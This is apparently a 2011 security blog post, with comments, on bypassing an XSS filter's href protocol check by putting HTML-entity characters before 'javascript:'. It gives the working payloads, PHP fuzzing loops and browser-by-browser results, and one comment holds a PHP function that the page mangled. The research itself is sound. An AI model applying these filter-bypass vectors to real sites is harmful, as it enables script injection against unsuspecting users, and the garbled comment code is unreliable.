Update: You can find a good fuzzer here (by Gareth Heyes), which inspects the location.protocol value. I realized that html_entity_decode is not completely good for our task; take a look at the comments for further very useful information.

Let's consider a XSS filter that tries to sanitize HTML code. It allows to insert links like the following:

<a href="http://www.x.x">click me</a>

It employs a regex to realize the protocol check (http / https / ftp are allowed), but we realize that this last one is not so smart. So we can bypass it by using html entities. It should allows us to to inject the following vector:

<a href=" javascript:alert(0)">click me</a>

By using an initial whitespace the filter becomes confused and allows it!
I'd like to know which characters I can use in that position in order to bypass similar stupid filters, that do not allow whitespaces. So let's fuzzing with a simple php code:

HTML Entities
for($i=0; $i<=50000 65535; $i++) {
$r = html_entity_decode('&#'.$i.';', ENT_QUOTES, 'UTF-8');
echo '<a href="'.$r.'javascript:alert(0)">click me</a> - '.$r.' - '.$i.' <br />';

Firefox 3.6.13 : &#8; &#9; &#10; &#13; &#32;
Opera 11.00 : from &#9; to &#13; and &#32;
Chrome 8.0.552.237 : from &#1; to &#32;
IE 8 : from &#0; to &#32;

So the following vector could be used by an attacker, hoping that the unlucky user uses either Chrome or IE.

<a href="&#1;javascript:alert(1)">sad<a>

Let's try with hex encoding:
Hex encoding
for($i=0; $i<=50000 65535; $i++) {
$h = '&#x'.dechex($i).';';
echo '<a href="'.$h.'javascript:alert(0)">click me</a> - '.$h.' - '.$i.' <br />';

Firefox 3.6.13 : &#x8; &#x9; &#xa; &#xd; &#x20;
Opera 11.00 : from &#x9; to &#xd; and &#x20;
Chrome 8.0.552.237 : from &#x1; to &#x20;
IE 8 : from &#x1; to &#x20;

Note that & should not be modified in & amp; by the filter.
Doesn't this kind of filters exist? I am sure you've already found something similar in your life :P

4 Responses to Bypassing a protocol check (HREF attribute)

  1. 230 Gareth Heyes 2011-01-26 8:45 am

    Yeah, I wrote a fuzzer to do this by inspecting the location.protocol value:-


    Notice in your fuzzer you're only going to 50000 when you can go to 0xFFFF or above. Generating chars using decode html entities is also flawed because you're trusting that function not generating it manually. Charset is also important. The function below generates a unicode char above what chr allows.

    function unichr($c) {
    if ($c <= 0x7f)="" {="" return="" chr($c);="" }="" else="" if="" ($c="" <="0x7FF)" chr(0xc0="" |="" $c="">> 6) . chr(0x80 | $c
    } else if ($c <= 0xffff)="" {="" return="" chr(0xe0="" |="" $c="">> 12) . chr(0x80 | $c >> 6
    } else if ($c <= 0x10ffff)="" {="" return="" chr(0xf0="" |="" $c="">> 18) . chr(0x80 | $c >> 12
    } else {
    return false;

  2. 231 sneak 2011-01-26 8:57 am

    Hi Gareth, your fuzzer is really cool! :)

    Yeah, I've to go to 65535, but I do not think I will find useful characters. However I'm going to test and update the blogpost.

    You're right about html_entity_decode, thank you for the advice and for the unichr function. :)
    Oh damn, the parser has modified your function, could you write it in another place (i.e. pastebin)?

  3. 233 Gareth Heyes 2011-01-26 1:43 pm

    Actually 0xFFFF is interesting because it's a zero space BOM character and on Firebox you used to be able to inject that in the middle of the url :)


    Keep them posts coming :D

  4. 234 sneak 2011-01-26 6:51 pm

    Ok, thank you! I'm going to realize some more tests... :)

Main Pages